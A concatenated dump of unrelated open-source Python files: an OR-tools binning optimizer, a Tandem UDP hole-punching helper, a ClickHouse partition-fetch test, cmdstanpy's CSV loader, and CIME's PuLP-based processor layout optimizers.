def __init__(self, monotonic_trend_x, monotonic_trend_y, min_n_bins,
max_n_bins, min_diff_x, min_diff_y, gamma, n_jobs,
time_limit):
self.monotonic_trend_x = monotonic_trend_x
self.monotonic_trend_y = monotonic_trend_y
self.min_n_bins = min_n_bins
self.max_n_bins = max_n_bins
self.min_diff_x = min_diff_x
self.min_diff_y = min_diff_y
self.gamma = gamma
self.n_jobs = n_jobs
self.time_limit = time_limit
self.solver_ = None
self.event_rate_ = None
self.iv_ = None
self._model = None
self._x = None
self._n_rectangles = None
def build_model(self, n_grid, n_rectangles, cols, c, d_connected_x,
d_connected_y, er, n_records):
# Initialize solver
solver = pywraplp.Solver(
'BinningMIP', pywraplp.Solver.CBC_MIXED_INTEGER_PROGRAMMING)
# Decision variables
x, d = self.decision_variables(solver, n_rectangles)
# Objective function
if self.gamma:
total_records = int(n_records.sum())
regularization = self.gamma / total_records
pmax = solver.NumVar(0, total_records, "pmax")
pmin = solver.NumVar(0, total_records, "pmin")
solver.Maximize(
solver.Sum([c[i] * x[i] for i in range(n_rectangles)]) -
regularization * (pmax - pmin))
else:
solver.Maximize(
solver.Sum([c[i] * x[i] for i in range(n_rectangles)]))
# Constraint: unique assignment
self.add_constraint_unique_assignment(solver, x, n_grid, cols)
# Constraint: min / max bins
self.add_constraint_min_max_bins(solver, n_rectangles, x, d)
# Constraint: monotonicity
self.add_constraint_monotonic(
solver, n_rectangles, x, er, d_connected_x, d_connected_y,
self.min_diff_x, self.min_diff_y)
# Constraint: reduction of dominating bins
if self.gamma:
for i in range(n_rectangles):
bin_size = n_records[i] * x[i]
solver.Add(pmin <= total_records * (1 - x[i]) + bin_size)
solver.Add(pmax >= bin_size)
solver.Add(pmin <= pmax)
# Save data for post-processing
self.solver_ = solver
self._x = x
self._n_rectangles = n_rectangles
def solve(self):
# Solve
self.solver_.SetTimeLimit(self.time_limit * 1000)
self.solver_.SetNumThreads(self.n_jobs)
status = self.solver_.Solve()
if status in (pywraplp.Solver.OPTIMAL, pywraplp.Solver.FEASIBLE):
if status == pywraplp.Solver.OPTIMAL:
status_name = "OPTIMAL"
else:
status_name = "FEASIBLE"
solution = np.array([self._x[i].solution_value()
for i in range(self._n_rectangles)])
solution = solution.astype(bool)
else:
if status == pywraplp.Solver.ABNORMAL:
status_name = "ABNORMAL"
elif status == pywraplp.Solver.INFEASIBLE:
status_name = "INFEASIBLE"
elif status == pywraplp.Solver.UNBOUNDED:
status_name = "UNBOUNDED"
else:
status_name = "UNKNOWN"
solution = np.zeros(self._n_rectangles).astype(bool)
return status_name, solution
def decision_variables(self, solver, n_rectangles):
x = {}
for i in range(n_rectangles):
x[i] = solver.BoolVar("x[{}]".format(i))
d = None
if self.min_n_bins is not None and self.max_n_bins is not None:
n_bin_diff = self.max_n_bins - self.min_n_bins
# Range constraints auxiliary variables
d = solver.NumVar(0, n_bin_diff, "n_bin_diff")
return x, d
def add_constraint_unique_assignment(self, solver, x, n_grid, cols):
for j in range(n_grid):
solver.Add(solver.Sum([x[i] for i in cols[j]]) == 1)
def add_constraint_min_max_bins(self, solver, n_rectangles, x, d):
if self.min_n_bins is not None or self.max_n_bins is not None:
n_bins = solver.Sum([x[i] for i in range(n_rectangles)])
if self.min_n_bins is not None and self.max_n_bins is not None:
solver.Add(d + n_bins - self.max_n_bins == 0)
elif self.min_n_bins is not None:
solver.Add(n_bins >= self.min_n_bins)
elif self.max_n_bins is not None:
solver.Add(n_bins <= self.max_n_bins)
def add_constraint_monotonic(self, solver, n_rectangles, x, er,
d_connected_x, d_connected_y, min_diff_x,
min_diff_y):
if (self.monotonic_trend_x is not None and
self.monotonic_trend_y is not None):
for i in range(n_rectangles):
ind_x = []
ind_y = []
for j in d_connected_x[i]:
if self.monotonic_trend_x == "ascending":
if er[i] + min_diff_x >= er[j]:
ind_x.append(j)
elif self.monotonic_trend_x == "descending":
if er[i] <= er[j] + min_diff_x:
ind_x.append(j)
if ind_x:
solver.Add(solver.Sum([x[j] for j in ind_x]) <=
len(ind_x) * (1 - x[i]))
for j in d_connected_y[i]:
if self.monotonic_trend_y == "ascending":
if er[i] + min_diff_y >= er[j]:
ind_y.append(j)
elif self.monotonic_trend_y == "descending":
if er[i] <= er[j] + min_diff_y:
ind_y.append(j)
if ind_y:
solver.Add(solver.Sum([x[j] for j in ind_y]) <=
len(ind_y) * (1 - x[i]))
elif self.monotonic_trend_x is not None:
for i in range(n_rectangles):
ind_x = []
for j in d_connected_x[i]:
if self.monotonic_trend_x == "ascending":
if er[i] + min_diff_x >= er[j]:
ind_x.append(j)
elif self.monotonic_trend_x == "descending":
if er[i] <= er[j] + min_diff_x:
ind_x.append(j)
if ind_x:
solver.Add(solver.Sum([x[j] for j in ind_x]) <=
len(ind_x) * (1 - x[i]))
elif self.monotonic_trend_y is not None:
for i in range(n_rectangles):
ind_y = []
for j in d_connected_y[i]:
if self.monotonic_trend_y == "ascending":
if er[i] + min_diff_y >= er[j]:
ind_y.append(j)
elif self.monotonic_trend_y == "descending":
if er[i] <= er[j] + min_diff_y:
ind_y.append(j)
if ind_y:
solver.Add(solver.Sum([x[j] for j in ind_y]) <=
len(ind_y) * (1 - x[i]))
|
c0e864939d5b1e74a62b232eec4e3b6100e226c9
|
73a63ce92e2eab1973ac136dfe453bd6945f56f8
|
/agent/tandem/agent/utils/hole_punching.py
|
8a9ead998c3adc5521c23cda0b16723d03f5d35c
|
[
"LicenseRef-scancode-warranty-disclaimer",
"LicenseRef-scancode-unknown-license-reference",
"Apache-2.0"
] |
permissive
|
typeintandem/tandem
|
5791af34c7d023c40297fa8ba4d66103d5ac78c5
|
81e76f675634f1b42c8c3070c73443f3f68f8624
|
refs/heads/master
| 2023-04-28T09:32:29.089076
| 2018-03-15T20:27:24
| 2018-03-15T20:27:24
| 91,004,353
| 746
| 24
|
Apache-2.0
| 2023-04-18T12:06:50
| 2017-05-11T17:10:31
|
Python
|
UTF-8
|
Python
| false
| false
| 951
|
py
|
hole_punching.py
|
from tandem.agent.protocol.messages.interagent import (
InteragentProtocolUtils,
Ping,
Syn,
)
class HolePunchingUtils:
PING_INTERVAL = 0.15
SYN_INTERVAL = 0.15
TIMEOUT = 3
@staticmethod
def generate_send_ping(gateway, addresses, id):
def send_ping():
HolePunchingUtils._send_message(
gateway,
addresses,
Ping(id=str(id)),
)
return send_ping
@staticmethod
def generate_send_syn(gateway, address):
def send_syn():
HolePunchingUtils._send_message(
gateway,
address,
Syn(),
)
return send_syn
@staticmethod
def _send_message(gateway, addresses, message):
io_data = gateway.generate_io_data(
InteragentProtocolUtils.serialize(message),
addresses,
)
gateway.write_io_data(io_data)
|
961bc6847a34220b5b5bf2682e1ed13dad732e14
|
057a475216e9beed41983481aafcaf109bbf58da
|
/tests/integration/test_fetch_partition_should_reset_mutation/test.py
|
7037393a3d26298f682df14d32fd444299e85001
|
[
"Apache-2.0"
] |
permissive
|
ClickHouse/ClickHouse
|
fece5204263a5b4d693854b6039699265f1bb27f
|
6649328db809d51a694c358571539bc5820464be
|
refs/heads/master
| 2023-08-31T18:48:36.615225
| 2023-08-31T17:51:24
| 2023-08-31T17:51:24
| 60,246,359
| 23,878
| 5,449
|
Apache-2.0
| 2023-09-14T20:10:52
| 2016-06-02T08:28:18
|
C++
|
UTF-8
|
Python
| false
| false
| 2,429
|
py
|
test.py
|
import pytest
from helpers.client import QueryRuntimeException
from helpers.cluster import ClickHouseCluster
from helpers.test_tools import TSV
cluster = ClickHouseCluster(__file__)
node = cluster.add_instance(
"node", main_configs=["configs/zookeeper_config.xml"], with_zookeeper=True
)
@pytest.fixture(scope="module")
def start_cluster():
try:
cluster.start()
yield cluster
finally:
cluster.shutdown()
def test_part_should_reset_mutation(start_cluster):
node.query(
"CREATE TABLE test (i Int64, s String) ENGINE = ReplicatedMergeTree('/clickhouse/tables/test', 'node') ORDER BY i;"
)
node.query("INSERT INTO test SELECT 1, 'a'")
node.query("optimize table test final")
node.query("optimize table test final")
expected = TSV("""all_0_0_2\t1\ta""")
assert TSV(node.query("SELECT _part, * FROM test")) == expected
node.query(
"ALTER TABLE test UPDATE s='xxx' WHERE 1", settings={"mutations_sync": "2"}
)
node.query(
"ALTER TABLE test UPDATE s='xxx' WHERE 1", settings={"mutations_sync": "2"}
)
node.query(
"ALTER TABLE test UPDATE s='xxx' WHERE 1", settings={"mutations_sync": "2"}
)
node.query(
"ALTER TABLE test UPDATE s='xxx' WHERE 1", settings={"mutations_sync": "2"}
)
expected = TSV("""all_0_0_2_4\t1\txxx""")
assert TSV(node.query("SELECT _part, * FROM test")) == expected
node.query(
"CREATE TABLE restore (i Int64, s String) ENGINE = ReplicatedMergeTree('/clickhouse/tables/restore', 'node') ORDER BY i;"
)
node.query(
"ALTER TABLE restore FETCH PARTITION tuple() FROM '/clickhouse/tables/test/'"
)
node.query("ALTER TABLE restore ATTACH PART 'all_0_0_2_4'")
node.query("INSERT INTO restore select 2, 'a'")
print(TSV(node.query("SELECT _part, * FROM restore")))
expected = TSV("""all_0_0_0\t1\txxx\nall_1_1_0\t2\ta""")
assert TSV(node.query("SELECT _part, * FROM restore ORDER BY i")) == expected
node.query(
"ALTER TABLE restore UPDATE s='yyy' WHERE 1", settings={"mutations_sync": "2"}
)
expected = TSV("""all_0_0_0_2\t1\tyyy\nall_1_1_0_2\t2\tyyy""")
assert TSV(node.query("SELECT _part, * FROM restore ORDER BY i")) == expected
node.query("ALTER TABLE restore DELETE WHERE 1", settings={"mutations_sync": "2"})
assert node.query("SELECT count() FROM restore").strip() == "0"
|
6dedb73429743ead3090ab57a37ccc65fb73de78
|
4edd01a0d66f6f3336f7396cec13f5da671a8dcb
|
/cmdstanpy/stanfit/__init__.py
|
6a7dd7caab2d805b32c177c8fecf02fd66b1b572
|
[
"BSD-3-Clause"
] |
permissive
|
stan-dev/cmdstanpy
|
c0a33ca6d3a6f5e1486b797e5a402df6cc66c92c
|
107a347f12b1abb4f3d7b8a380d1138f6633d26b
|
refs/heads/develop
| 2023-09-03T19:03:09.568378
| 2023-08-28T19:19:40
| 2023-08-28T19:19:40
| 163,899,458
| 135
| 75
|
BSD-3-Clause
| 2023-09-11T20:33:23
| 2019-01-02T23:18:04
|
Python
|
UTF-8
|
Python
| false
| false
| 8,659
|
py
|
__init__.py
|
"""Container objects for results of CmdStan run(s)."""
import glob
import os
from typing import Any, Dict, List, Optional, Union
from cmdstanpy.cmdstan_args import (
CmdStanArgs,
OptimizeArgs,
SamplerArgs,
VariationalArgs,
)
from cmdstanpy.utils import check_sampler_csv, get_logger, scan_config
from .gq import CmdStanGQ
from .laplace import CmdStanLaplace
from .mcmc import CmdStanMCMC
from .metadata import InferenceMetadata
from .mle import CmdStanMLE
from .runset import RunSet
from .vb import CmdStanVB
__all__ = [
"RunSet",
"InferenceMetadata",
"CmdStanMCMC",
"CmdStanMLE",
"CmdStanVB",
"CmdStanGQ",
"CmdStanLaplace",
]
def from_csv(
path: Union[str, List[str], os.PathLike, None] = None,
method: Optional[str] = None,
) -> Union[CmdStanMCMC, CmdStanMLE, CmdStanVB, None]:
"""
Instantiate a CmdStan object from the Stan CSV files produced by a CmdStan run.
CSV files are specified from either a list of Stan CSV files or a single
filepath which can be either a directory name, a Stan CSV filename, or
a pathname pattern (i.e., a Python glob). The optional argument 'method'
checks that the CSV files were produced by that method.
Stan CSV files from CmdStan methods 'sample', 'optimize', and 'variational'
result in objects of class CmdStanMCMC, CmdStanMLE, and CmdStanVB,
respectively.
:param path: directory path
:param method: method name (optional)
:return: either a CmdStanMCMC, CmdStanMLE, or CmdStanVB object
"""
if path is None:
raise ValueError('Must specify path to Stan CSV files.')
if method is not None and method not in [
'sample',
'optimize',
'variational',
]:
raise ValueError(
'Bad method argument {}, must be one of: '
'"sample", "optimize", "variational"'.format(method)
)
csvfiles = []
if isinstance(path, list):
csvfiles = path
elif isinstance(path, str) and '*' in path:
splits = os.path.split(path)
if splits[0] is not None:
if not (os.path.exists(splits[0]) and os.path.isdir(splits[0])):
raise ValueError(
'Invalid path specification, {} '
' unknown directory: {}'.format(path, splits[0])
)
csvfiles = glob.glob(path)
elif isinstance(path, (str, os.PathLike)):
if os.path.exists(path) and os.path.isdir(path):
for file in os.listdir(path):
if os.path.splitext(file)[1] == ".csv":
csvfiles.append(os.path.join(path, file))
elif os.path.exists(path):
csvfiles.append(str(path))
else:
raise ValueError('Invalid path specification: {}'.format(path))
else:
raise ValueError('Invalid path specification: {}'.format(path))
if len(csvfiles) == 0:
raise ValueError('No CSV files found in directory {}'.format(path))
for file in csvfiles:
if not (os.path.exists(file) and os.path.splitext(file)[1] == ".csv"):
raise ValueError(
'Bad CSV file path spec,'
' includes non-csv file: {}'.format(file)
)
config_dict: Dict[str, Any] = {}
try:
with open(csvfiles[0], 'r') as fd:
scan_config(fd, config_dict, 0)
except (IOError, OSError, PermissionError) as e:
raise ValueError('Cannot read CSV file: {}'.format(csvfiles[0])) from e
if 'model' not in config_dict or 'method' not in config_dict:
raise ValueError("File {} is not a Stan CSV file.".format(csvfiles[0]))
if method is not None and method != config_dict['method']:
raise ValueError(
'Expecting Stan CSV output files from method {}, '
' found outputs from method {}'.format(
method, config_dict['method']
)
)
try:
if config_dict['method'] == 'sample':
chains = len(csvfiles)
sampler_args = SamplerArgs(
iter_sampling=config_dict['num_samples'],
iter_warmup=config_dict['num_warmup'],
thin=config_dict['thin'],
save_warmup=config_dict['save_warmup'],
)
# bugfix 425, check for fixed_params output
try:
check_sampler_csv(
csvfiles[0],
iter_sampling=config_dict['num_samples'],
iter_warmup=config_dict['num_warmup'],
thin=config_dict['thin'],
save_warmup=config_dict['save_warmup'],
)
except ValueError:
try:
check_sampler_csv(
csvfiles[0],
is_fixed_param=True,
iter_sampling=config_dict['num_samples'],
iter_warmup=config_dict['num_warmup'],
thin=config_dict['thin'],
save_warmup=config_dict['save_warmup'],
)
sampler_args = SamplerArgs(
iter_sampling=config_dict['num_samples'],
iter_warmup=config_dict['num_warmup'],
thin=config_dict['thin'],
save_warmup=config_dict['save_warmup'],
fixed_param=True,
)
except ValueError as e:
raise ValueError(
'Invalid or corrupt Stan CSV output file, '
) from e
cmdstan_args = CmdStanArgs(
model_name=config_dict['model'],
model_exe=config_dict['model'],
chain_ids=[x + 1 for x in range(chains)],
method_args=sampler_args,
)
runset = RunSet(args=cmdstan_args, chains=chains)
runset._csv_files = csvfiles
for i in range(len(runset._retcodes)):
runset._set_retcode(i, 0)
fit = CmdStanMCMC(runset)
fit.draws()
return fit
elif config_dict['method'] == 'optimize':
if 'algorithm' not in config_dict:
raise ValueError(
"Cannot find optimization algorithm"
" in file {}.".format(csvfiles[0])
)
optimize_args = OptimizeArgs(
algorithm=config_dict['algorithm'],
save_iterations=config_dict['save_iterations'],
jacobian=config_dict.get('jacobian', 0),
)
cmdstan_args = CmdStanArgs(
model_name=config_dict['model'],
model_exe=config_dict['model'],
chain_ids=None,
method_args=optimize_args,
)
runset = RunSet(args=cmdstan_args)
runset._csv_files = csvfiles
for i in range(len(runset._retcodes)):
runset._set_retcode(i, 0)
return CmdStanMLE(runset)
elif config_dict['method'] == 'variational':
if 'algorithm' not in config_dict:
raise ValueError(
"Cannot find variational algorithm"
" in file {}.".format(csvfiles[0])
)
variational_args = VariationalArgs(
algorithm=config_dict['algorithm'],
iter=config_dict['iter'],
grad_samples=config_dict['grad_samples'],
elbo_samples=config_dict['elbo_samples'],
eta=config_dict['eta'],
tol_rel_obj=config_dict['tol_rel_obj'],
eval_elbo=config_dict['eval_elbo'],
output_samples=config_dict['output_samples'],
)
cmdstan_args = CmdStanArgs(
model_name=config_dict['model'],
model_exe=config_dict['model'],
chain_ids=None,
method_args=variational_args,
)
runset = RunSet(args=cmdstan_args)
runset._csv_files = csvfiles
for i in range(len(runset._retcodes)):
runset._set_retcode(i, 0)
return CmdStanVB(runset)
else:
get_logger().info(
'Unable to process CSV output files from method %s.',
(config_dict['method']),
)
return None
except (IOError, OSError, PermissionError) as e:
raise ValueError(
'An error occurred processing the CSV files:\n\t{}'.format(str(e))
) from e
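# --- Usage sketch (illustrative addition, not part of the original module) ---
# Rebuilds a fit from existing Stan CSV output instead of re-running CmdStan.
# The directory name below is hypothetical; any directory, glob pattern, or
# list of per-chain CSV files written by the 'sample' method would do.
if __name__ == "__main__":
fit = from_csv(path="./stan_csv_output", method="sample")
print(fit.summary())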
|
65244afbc0358152f637fa7e65e0b0e0d50b0394
|
045ec3ae16fc554a05510abc3697557ebc5ce304
|
/tools/load_balancing_tool/layouts.py
|
7b4e0b32d790c5f69c5940f201f24db8a9f3b428
|
[
"LicenseRef-scancode-unknown-license-reference",
"BSD-3-Clause"
] |
permissive
|
ESMCI/cime
|
c09223ee9b8a463bd00741ff39f60fda7639af89
|
02fad90a379cdbd3c1106cbd63324480f0bf7a22
|
refs/heads/master
| 2023-08-16T07:03:22.224344
| 2023-08-03T19:47:53
| 2023-08-03T19:47:53
| 31,605,662
| 159
| 179
|
NOASSERTION
| 2023-09-12T18:38:42
| 2015-03-03T15:33:00
|
Python
|
UTF-8
|
Python
| false
| false
| 15,250
|
py
|
layouts.py
|
import optimize_model
import pulp
class IceLndAtmOcn(optimize_model.OptimizeModel):
"""
Optimize the problem based on the layout
____________________
| ICE | LND | |
|______|_______| |
| | OCN |
| ATM | |
|______________|_____|
Min T
s.t. T[ice] <= T1
T[lnd] <= T1
T1 + T[atm] <= T
T[ocn] <= T
NB[c] >= 1 for c in [ice,lnd,ocn,atm]
NB[ice] + NB[lnd] <= NB[atm]
atm_blocksize*NB[atm] + ocn_blocksize*NB[ocn] <= TotalTasks
(NB[*] is number of processor blocks)
T[c] >= C[c]_{i} - NB[c]_{i} *
(C[c]_{i+1} - C[c]_{i}) / (NB[c]_{i+1} - NB[c]_{i})
+ NB[c] * (C[c]_{i+1} - C[c]_{i})
/ (NB[c]_{i+1} - NB[c]_{i}),
i=1..ord(NB), c in [ice,lnd,ocn,atm]
These assumptions are checked when solver is initialized
. Assuming cost is monotonic decreasing vs ntasks
. Assuming perfect scalability for ntasks < tasks[0]
. Assuming same scalability factor for ntasks > ntasks[last] as for
last two data points
Returns state (STATE_SOLVED_OK, STATE_SOLVED_BAD, STATE_UNSOLVED)
If solved, then solution will be stored in self.X dictionary, indexed
by variable name. Suggested convention:
'Tice', 'Tlnd', ... for cost per component
'Nice', 'Nlnd', ... for ntasks per component
'NBice', 'NBlnd', ... for number of blocks per component
"""
def get_required_components(self):
return ["LND", "ICE", "ATM", "OCN"]
def optimize(self):
"""
Run the optimization.
set solution in self.X
set state STATE_SOLVED_OK if solved,
otherwise STATE_SOLVED_BAD
"""
assert (
self.state != self.STATE_UNDEFINED
), "set_data() must be called before optimize()!"
self.atm = self.models["ATM"]
self.lnd = self.models["LND"]
self.ice = self.models["ICE"]
self.ocn = self.models["OCN"]
self.real_variables = ["TotalTime", "T1", "Tice", "Tlnd", "Tatm", "Tocn"]
self.integer_variables = [
"NBice",
"NBlnd",
"NBatm",
"NBocn",
"Nice",
"Nlnd",
"Natm",
"Nocn",
]
self.X = {}
X = self.X
self.prob = pulp.LpProblem("Minimize ACME time cost", pulp.LpMinimize)
for rv in self.real_variables:
X[rv] = pulp.LpVariable(rv, lowBound=0)
for iv in self.integer_variables:
X[iv] = pulp.LpVariable(iv, lowBound=1, cat=pulp.LpInteger)
# cost function
self.prob += X["TotalTime"]
# constraints
self.constraints = []
# Layout-dependent constraints. Choosing another layout to model
# will require editing these constraints
self.constraints.append([X["Tice"] - X["T1"] <= 0, "Tice - T1 == 0"])
self.constraints.append([X["Tlnd"] - X["T1"] <= 0, "Tlnd - T1 == 0"])
self.constraints.append(
[X["T1"] + X["Tatm"] - X["TotalTime"] <= 0, "T1 + Tatm - TotalTime <= 0"]
)
self.constraints.append(
[X["Tocn"] - X["TotalTime"] <= 0, "Tocn - TotalTime == 0"]
)
self.constraints.append(
[X["Nice"] + X["Nlnd"] - X["Natm"] == 0, "Nice + Nlnd - Natm == 0"]
)
self.constraints.append(
[
X["Natm"] + X["Nocn"] == self.maxtasks,
"Natm + Nocn <= %d" % (self.maxtasks),
]
)
self.constraints.append(
[
self.atm.blocksize * X["NBatm"] - X["Natm"] == 0,
"Natm = %d * NBatm" % self.atm.blocksize,
]
)
self.constraints.append(
[
self.ice.blocksize * X["NBice"] - X["Nice"] == 0,
"Nice = %d * NBice" % self.ice.blocksize,
]
)
self.constraints.append(
[
self.lnd.blocksize * X["NBlnd"] - X["Nlnd"] == 0,
"Nlnd = %d * NBlnd" % self.lnd.blocksize,
]
)
self.constraints.append(
[
self.ocn.blocksize * X["NBocn"] - X["Nocn"] == 0,
"Nocn = %d * NBocn" % self.ocn.blocksize,
]
)
# These are the constraints based on the timing data.
# They should be the same no matter what the layout of the components.
self.add_model_constraints()
for c, s in self.constraints:
self.prob += c, s
# Write the program to file and solve (using coin-cbc)
self.prob.writeLP("IceLndAtmOcn_model.lp")
self.prob.solve()
self.set_state(self.prob.status)
return self.state
def get_solution(self):
"""
Return a dictionary of the solution variables.
"""
assert (
self.state == self.STATE_SOLVED_OK
), "solver failed, no solution available"
return {
"NBLOCKS_ICE": self.X["NBice"].varValue,
"NBLOCKS_LND": self.X["NBlnd"].varValue,
"NBLOCKS_ATM": self.X["NBatm"].varValue,
"NBLOCKS_OCN": self.X["NBocn"].varValue,
"NTASKS_ICE": self.X["Nice"].varValue,
"NTASKS_LND": self.X["Nlnd"].varValue,
"NTASKS_ATM": self.X["Natm"].varValue,
"NTASKS_OCN": self.X["Nocn"].varValue,
"NTASKS_TOTAL": self.maxtasks,
"COST_ICE": self.X["Tice"].varValue,
"COST_LND": self.X["Tlnd"].varValue,
"COST_ATM": self.X["Tatm"].varValue,
"COST_OCN": self.X["Tocn"].varValue,
"COST_TOTAL": self.X["TotalTime"].varValue,
}
def write_pe_file(self, pefilename):
"""
Write out a pe_file that can be used to implement the
optimized layout
"""
assert (
self.state == self.STATE_SOLVED_OK
), "solver failed, no solution available"
natm = int(self.X["Natm"].varValue)
nlnd = int(self.X["Nlnd"].varValue)
nice = int(self.X["Nice"].varValue)
nocn = int(self.X["Nocn"].varValue)
ntasks = {
"atm": natm,
"lnd": nlnd,
"rof": 1,
"ice": nice,
"ocn": nocn,
"glc": 1,
"wav": 1,
"cpl": 1,
}
roots = {
"atm": 0,
"lnd": nice,
"rof": 0,
"ice": 0,
"ocn": natm,
"glc": 0,
"wav": 0,
"cpl": 0,
}
nthrds = {}
for c in ["atm", "lnd", "rof", "ice", "ocn", "glc", "wav", "cpl"]:
if c.upper() in self.models:
nthrds[c] = self.models[c.upper()].nthrds
else:
nthrds[c] = 1
self.write_pe_template(pefilename, ntasks, nthrds, roots)
class IceLndWavAtmOcn(optimize_model.OptimizeModel):
"""
Optimize the problem based on the layout
__________________________
| ICE | LND | WAV | |
|______|_______|_____| |
| | OCN |
| ATM | |
|____________________|_____|
Min T
s.t. T[ice] <= T1
T[lnd] <= T1
T[wav] <= T1
T1 + T[atm] <= T
T[ocn] <= T
NB[c] >= 1 for c in [ice,lnd,wav,ocn,atm]
NB[ice] + NB[lnd] + NB[wav] <= NB[atm]
atm_blocksize*NB[atm] + ocn_blocksize*NB[ocn] <= TotalTasks
(NB[*] is number of processor blocks)
T[c] >= C[c]_{i} - NB[c]_{i} *
(C[c]_{i+1} - C[c]_{i}) / (NB[c]_{i+1} - NB[c]_{i})
+ NB[c] * (C[c]_{i+1} - C[c]_{i})
/ (NB[c]_{i+1} - NB[c]_{i}),
i=1..ord(NB), c in [ice,lnd,wav,ocn,atm]
These assumptions are checked when solver is initialized
. Assuming cost is monotonic decreasing vs ntasks
. Assuming perfect scalability for ntasks < tasks[0]
. Assuming same scalability factor for ntasks > ntasks[last] as for
last two data points
. Assuming components are capable of running on ntasks
Returns state (STATE_SOLVED_OK, STATE_SOLVED_BAD, STATE_UNSOLVED)
If solved, then solution will be stored in self.X dictionary, indexed
by variable name. Suggested convention:
'Tice', 'Tlnd', ... for cost per component
'Nice', 'Nlnd', ... for ntasks per component
'NBice', 'NBlnd', ... for number of blocks per component
"""
def __init__(self):
self.models = {}
def get_required_components(self):
return ["LND", "ICE", "WAV", "ATM", "OCN"]
def optimize(self):
"""
Run the optimization.
set solution in self.X
set state STATE_SOLVED_OK if solved,
otherwise STATE_SOLVED_BAD
"""
assert (
self.state != self.STATE_UNDEFINED
), "set_data() must be called before optimize()!"
self.atm = self.models["ATM"]
self.lnd = self.models["LND"]
self.ice = self.models["ICE"]
self.ocn = self.models["OCN"]
self.wav = self.models["WAV"]
self.real_variables = [
"TotalTime",
"T1",
"Tice",
"Tlnd",
"Tatm",
"Tocn",
"Twav",
]
self.integer_variables = [
"NBice",
"NBlnd",
"NBatm",
"NBocn",
"NBwav",
"Nice",
"Nlnd",
"Natm",
"Nocn",
"Nwav",
]
self.X = {}
X = self.X
self.prob = pulp.LpProblem("Minimize ACME time cost", pulp.LpMinimize)
for rv in self.real_variables:
X[rv] = pulp.LpVariable(rv, lowBound=0)
for iv in self.integer_variables:
X[iv] = pulp.LpVariable(iv, lowBound=1, cat=pulp.LpInteger)
# cost function
self.prob += X["TotalTime"]
# constraints
self.constraints = []
# Layout-dependent constraints. Choosing another layout to model
# will require editing these constraints
self.constraints.append([X["Tice"] - X["T1"] <= 0, "Tice - T1 == 0"])
self.constraints.append([X["Tlnd"] - X["T1"] <= 0, "Tlnd - T1 == 0"])
self.constraints.append([X["Twav"] - X["T1"] <= 0, "Twav - T1 == 0"])
self.constraints.append(
[X["T1"] + X["Tatm"] - X["TotalTime"] <= 0, "T1 + Tatm - TotalTime <= 0"]
)
self.constraints.append(
[X["Tocn"] - X["TotalTime"] <= 0, "Tocn - TotalTime == 0"]
)
self.constraints.append(
[
X["Nice"] + X["Nlnd"] + X["Nwav"] - X["Natm"] == 0,
"Nice + Nlnd + Nwav - Natm == 0",
]
)
self.constraints.append(
[
X["Natm"] + X["Nocn"] == self.maxtasks,
"Natm + Nocn <= %d" % (self.maxtasks),
]
)
self.constraints.append(
[
self.atm.blocksize * X["NBatm"] - X["Natm"] == 0,
"Natm = %d * NBatm" % self.atm.blocksize,
]
)
self.constraints.append(
[
self.ice.blocksize * X["NBice"] - X["Nice"] == 0,
"Nice = %d * NBice" % self.ice.blocksize,
]
)
self.constraints.append(
[
self.lnd.blocksize * X["NBlnd"] - X["Nlnd"] == 0,
"Nlnd = %d * NBlnd" % self.lnd.blocksize,
]
)
self.constraints.append(
[
self.ocn.blocksize * X["NBocn"] - X["Nocn"] == 0,
"Nocn = %d * NBocn" % self.ocn.blocksize,
]
)
self.constraints.append(
[
self.wav.blocksize * X["NBwav"] - X["Nwav"] == 0,
"Nwav = %d * NBwav" % self.wav.blocksize,
]
)
# These are the constraints based on the timing data.
# They should be the same no matter what the layout of the components.
self.add_model_constraints()
for c, s in self.constraints:
self.prob += c, s
# Write the program to file and solve (using coin-cbc)
self.prob.writeLP("IceLndWavAtmOcn_model.lp")
self.prob.solve()
self.set_state(self.prob.status)
return self.state
def get_solution(self):
"""
Return a dictionary of the solution variables.
"""
assert (
self.state == self.STATE_SOLVED_OK
), "solver failed, no solution available"
return {
"NBLOCKS_ICE": self.X["NBice"].varValue,
"NBLOCKS_LND": self.X["NBlnd"].varValue,
"NBLOCKS_WAV": self.X["NBwav"].varValue,
"NBLOCKS_ATM": self.X["NBatm"].varValue,
"NBLOCKS_OCN": self.X["NBocn"].varValue,
"NTASKS_ICE": self.X["Nice"].varValue,
"NTASKS_LND": self.X["Nlnd"].varValue,
"NTASKS_WAV": self.X["Nwav"].varValue,
"NTASKS_ATM": self.X["Natm"].varValue,
"NTASKS_OCN": self.X["Nocn"].varValue,
"NTASKS_TOTAL": self.maxtasks,
"COST_ICE": self.X["Tice"].varValue,
"COST_LND": self.X["Tlnd"].varValue,
"COST_WAV": self.X["Twav"].varValue,
"COST_ATM": self.X["Tatm"].varValue,
"COST_OCN": self.X["Tocn"].varValue,
"COST_TOTAL": self.X["TotalTime"].varValue,
}
def write_pe_file(self, pefilename):
"""
Write out a pe_file that can be used to implement the
optimized layout
"""
assert (
self.state == self.STATE_SOLVED_OK
), "solver failed, no solution available"
natm = int(self.X["Natm"].varValue)
nlnd = int(self.X["Nlnd"].varValue)
nice = int(self.X["Nice"].varValue)
nocn = int(self.X["Nocn"].varValue)
nwav = int(self.X["Nwav"].varValue)
ntasks = {
"atm": natm,
"lnd": nlnd,
"rof": 1,
"ice": nice,
"ocn": nocn,
"glc": 1,
"wav": nwav,
"cpl": 1,
}
roots = {
"atm": 0,
"lnd": 0,
"rof": 0,
"ice": nlnd,
"ocn": natm,
"glc": 0,
"wav": nlnd + nice,
"cpl": 0,
}
nthrds = {}
for c in ["atm", "lnd", "rof", "ice", "ocn", "glc", "wav", "cpl"]:
if c.upper() in self.models:
nthrds[c] = self.models[c.upper()].nthrds
else:
nthrds[c] = 1
self.write_pe_template(pefilename, ntasks, nthrds, roots)
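# --- Illustrative sketch (not part of the original module) ---
# A toy PuLP program mirroring the IceLndAtmOcn layout constraints with fixed,
# made-up component costs in place of the piecewise scalability constraints
# that add_model_constraints() derives from timing data.
if __name__ == "__main__":
toy = pulp.LpProblem("Toy_IceLndAtmOcn", pulp.LpMinimize)
total = pulp.LpVariable("TotalTime", lowBound=0)
t1 = pulp.LpVariable("T1", lowBound=0)
# Pretend per-component costs (seconds) at some fixed task counts.
cost = {"ice": 3.0, "lnd": 2.0, "atm": 10.0, "ocn": 11.0}
toy += total # objective: minimize total time
toy += t1 >= cost["ice"], "Tice_le_T1"
toy += t1 >= cost["lnd"], "Tlnd_le_T1"
toy += total >= t1 + cost["atm"], "T1_plus_Tatm_le_T"
toy += total >= cost["ocn"], "Tocn_le_T"
toy.solve()
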